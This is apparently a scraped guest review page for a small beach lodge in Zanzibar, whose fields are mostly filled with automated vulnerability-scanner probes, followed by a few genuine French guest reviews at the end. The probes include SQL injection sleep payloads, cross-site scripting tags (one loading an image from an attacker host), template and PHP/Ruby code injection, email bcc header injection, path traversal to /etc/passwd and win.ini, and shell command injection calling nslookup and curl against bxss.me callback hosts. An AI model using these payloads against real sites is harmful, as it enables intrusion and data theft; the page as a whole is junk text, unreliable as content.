1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
20
20
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<a41tgfs<
20
20
20
20
20″||sleep(27*1000)*hubkti|| »
20’||sleep(27*1000)*mgylff||’
20
20
20
20
20<img sRc='http://attacker-9361/log.php?
20″&&sleep(27*1000)*hfoldi&& »
20
20
20’&&sleep(27*1000)*kwhxup&&’
20
« .gethostbyname(lc(« hitey ». »wdvjoonff90c8.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(113).chr(79).chr(109).chr(67). »
20
‘ »()
20
‘.gethostbyname(lc(‘hitwk’.’ypcwdytj45e8a.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(109).chr(90).chr(114).chr(69).’
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
204PQTU[!+!]
20
20
20
20
20
20
20
20
20
20
20
207DZ8S
20
20
20
20
20
20
20
20
20
20
20
20
20
20}body{zzz:Expre/**/SSion(2lV3(9874))}
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
^(#$!@#$)(()))******
20
20
20
20
!(()&&!|*|*|
20
20
555
20
20
)
20
20
20
20
20
20
20
20
20
20
20
20
20<ScRiPt>2lV3(9499)</sCripT>
555
20
20
20
20
20
20
20
20
20
20u003CScRiPt2lV3(9496)u003C/sCripTu003E
20
20
555
20
20
20
20
20
20
20
20
20
9100
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
202lV3(9881)
20
20
20
20
20
${10000278+10000062}
20
20
20
20
20
20
20
20
20
20
12345′ »‘ »);|]*{‘💡
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
to@example.com>bcc:009247.295-34579.295.ce3f6.20102.2@bxss.me
20
20
20
20
20bcc:009247.295-34578.295.ce3f6.20102.2@bxss.me
20
20
20SV78G[!+!]
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
dfb__${98991*97996}__::.x
20
20
20
20
20
20
dfb[[${98991*97996}]]xca
20
20
20
20
20
20
20
20
dfb{{98991*97996}}xca
20
20
20
« +response.write(9435465*9515607)+ »
20
1}} »}}’}}1%> »%>’%>
20
‘+response.write(9435465*9515607)+’
20
20
20
response.write(9435465*9515607)
20
20
<th:t="${dfb}#foreach
20
20
20
bfgx5149z1z2abcxhjl5149
20
20
20
20
bfg8030s1s2s3hjl8030
20
209775774
20
20
20
20
‘ »()&%
20
20′ »()&%
20
20
1CHzKyHnZVO
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
555
555
555
555
555
555
20
555
555
555
555
555
555
20
555
555
20
20
555
20
555
555
555
555
20
555
555
555
20
20
555
555
20
555
20
20
555
20
555
20
20
20
555
20
555
555
20
555
555
555
555
20
555
555
20
20
555
555
20
20
20
20
20
20
20
20
20
555
20
555
555
20
20
555
555
20
20
20
20
20
555
20
555
20
555
555
555
20
20
20
555
20
555
555
20
20
555
20
555
555
555
20
20
555
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
;(nslookup -q=cname hitlmkxnacjjhee724.bxss.me||curl hitlmkxnacjjhee724.bxss.me)|(nslookup -q=cname hitlmkxnacjjhee724.bxss.me||curl hitlmkxnacjjhee724.bxss.me)&(nslookup -q=cname hitlmkxnacjjhee724.bxss.me||curl hitlmkxnacjjhee724.bxss.me)
`(nslookup -q=cname hitgfxebhuhkb6aeb6.bxss.me||curl hitgfxebhuhkb6aeb6.bxss.me)`
20
|(nslookup -q=cname hitrzeotuapafd1686.bxss.me||curl hitrzeotuapafd1686.bxss.me)
&(nslookup -q=cname hitbclxoafjtzff61b.bxss.me||curl hitbclxoafjtzff61b.bxss.me)&’ »`0&(nslookup -q=cname hitbclxoafjtzff61b.bxss.me||curl hitbclxoafjtzff61b.bxss.me)&`’
&nslookup -q=cname hitqjjnzanktgc2ef2.bxss.me&’ »`0&nslookup -q=cname hitqjjnzanktgc2ef2.bxss.me&`’
20
$(nslookup -q=cname hitmtubzknbvdf5b1a.bxss.me||curl hitmtubzknbvdf5b1a.bxss.me)
(nslookup -q=cname hiterreqhsoje24efa.bxss.me||curl hiterreqhsoje24efa.bxss.me))
20|echo lyekri$() icvfhgnz^xyu||a #’ |echo lyekri$() icvfhgnz^xyu||a #| » |echo lyekri$() icvfhgnz^xyu||a #
20
20
|echo tqexcm$() mlghffnz^xyu||a #’ |echo tqexcm$() mlghffnz^xyu||a #| » |echo tqexcm$() mlghffnz^xyu||a #
20
20&echo wzrvsr$() greadinz^xyu||a #’ &echo wzrvsr$() greadinz^xyu||a #| » &echo wzrvsr$() greadinz^xyu||a #
20
20
<!–
&echo cxxcac$() sdpzpbnz^xyu||a #’ &echo cxxcac$() sdpzpbnz^xyu||a #| » &echo cxxcac$() sdpzpbnz^xyu||a #
20
‘ »
echo aldnxe$() bbgghonz^xyu||a #’ &echo aldnxe$() bbgghonz^xyu||a #| » &echo aldnxe$() bbgghonz^xyu||a #
20
20
20
20
20
20
20
20
20
20
20
20
../20
20
20
20
20
20
20
20
20
file:///etc/passwd
20
20
../../../../../../../../../../../../../../windows/win.ini
20
20
20
20
20
20
‘+’A’.concat(70-3).concat(22*4).concat(114).concat(69).concat(101).concat(78)+(require’socket’
Socket.gethostbyname(‘hitlw’+’qlqeilyv973bc.bxss.me.’)[3].to_s)+’
20
20
../../../../../../../../../../../../../../etc/passwd
20
20
20
« + »A ».concat(70-3).concat(22*4).concat(116).concat(73).concat(98).concat(84)+(require »socket »
Socket.gethostbyname(« hitjc »+ »lajalpmn31f6f.bxss.me. »)[3].to_s)+ »
20
20
20
20
20
20
20
20
bxss.me
20
20
c:/windows/win.ini
‘.print(md5(31337)).’
20
20
${@print(md5(31337))}
20
/etc/shells
20
20
20
http://bxss.me/t/fit.txt.jpg
20
20
${@print(md5(31337))}
20
xfs.bxss.me
Http://bxss.me/t/fit.txt
20
20
20
« ;print(md5(31337));$a= »
‘;print(md5(31337));$a=’
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
20
20
20
20
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20″||sleep(27*1000)*jcvyyh|| »
20
20
20’||sleep(27*1000)*epbizw||’
20
bxss.me/t/xss.html?
20
20
20″&&sleep(27*1000)*vjdkgc&& »
HttP://bxss.me/t/xss.html?
20
20’&&sleep(27*1000)*wenszi&&’
20
20
20
20
‘ »()
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
^(#$!@#$)(()))******
!(()&&!|*|*|
20
20
20
20
20
)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
« .gethostbyname(lc(« hitkp ». »wbrbmkxb98c94.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(107).chr(89).chr(110).chr(66). »
20
‘.gethostbyname(lc(‘hitpv’.’tkauiewecbf62.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(108).chr(79).chr(109).chr(65).’
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
« +response.write(9989423*9015685)+ »
20
20
20
20
‘+response.write(9989423*9015685)+’
12345′ »‘ »);|]*{‘💡
20
${9999898+9999016}
20
20
20
20
20
20
response.write(9989423*9015685)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
to@example.com>bcc:009247.295-34209.295.03a72.20102.2@bxss.me
20
20
20bcc:009247.295-34208.295.03a72.20102.2@bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1lDDvgoReO
20
20
20
20
20
20
20
20
20
20
20
20
20
379cat
4w3ezc
a7jgth
1immes
cv8jsl
7f2dpb
hwqzo0
obdlpz
v3v2e6
p1z7zg
ap6b5l
d3kgzu
lywjox
C’ est une adresse que l’on aimerait garder confidentielle!un paradis comme il en existe encore peu dans la monde,tant par le site ,les quelques bungalows très confortables face au font de mer turquoise,plage privée,dans un environnement luxuriant ,aux multiples essences tropicales..un accueil d’une gentillesse toute personnalisée avec maintes attentions ,une cuisine excellente , aux produits locaux au barbecue et aux épices du cru ,(pêches toute fraiches du jour,langoustes,homards ..)fruits tropicaux gouteux;Grand avantage:Sandrine et David nos hôtes sont entourés d’un réseau de connaissances locales qui vous guideront ,individuellement , vers des ilots merveilleux en bateau,ou bien nager avec des dauphins ,ou découvrir la ville de Stone town,pour des prix très doux, leur bungalow sont a proximité d’un petit village de pécheurs ,donc non isolés mais a proximité d’un grand nombre d’excursions et de découvertes mer/terre,sans tourisme envahissant!!Et grâce a leur structure (5 Bungalows),beaucoup de convivialité entre les « clients »du monde entier!que dire de plus sinon qu’ils se plient en 4 pour vous faire plaisir et leur équipe de Massai est à leur image!pour des voyageurs comme nous ,cela n’est pas si fréquent de réunir autant d’atout!donc à recommander vivement pour un séjour en toute quiétude et de bonheur à Zanzibar!Françoise
c est un petit paradis. l hospitalité de l équipe ,le charme et la simplicité des lodges ,la nourriture pétille de saveurs , un des rares hotels voir le seul a posséder une plage privée sur kizimkazi. si vous cherchez la tranquillité et le confort, n allez pas plus loin. merci a toute l équipe pour tous vos conseils ( nager avec les dauphins, barbecue au milieu de nul part,……..) a très vite
merci , vous êtes des personnes très bonnes et quelle hospitalité; l ocean est magnifique , doux , saveurs tropicales, coucher de soleil magique ,oiseaux, papillons ,ciel ,nourriture délicieuse , énormes bungalows
le meilleur chemin vers le rêve
Cet endroit est idyllique. Le service est parfait et le lieu magnifique.
